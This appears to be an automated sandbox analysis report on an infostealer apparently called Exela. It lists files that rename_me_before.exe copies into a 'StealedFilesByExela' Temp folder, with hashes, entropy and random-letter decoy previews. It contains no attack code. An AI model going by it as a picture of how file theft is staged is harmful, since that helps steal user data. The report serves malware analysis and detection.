                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\YPSIACHYXW.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\BPMLNOBVSB.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\DTBZGIOOSO.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\FENIVHOIKN.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                                          MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                                          SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                                          SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                                          SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\HTAGVDFUIE.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\HTAGVDFUIE.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\KATAXZVCPS.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                          MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                          SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                          SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                          SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\KZWFNRXYKI.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\KZWFNRXYKI.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
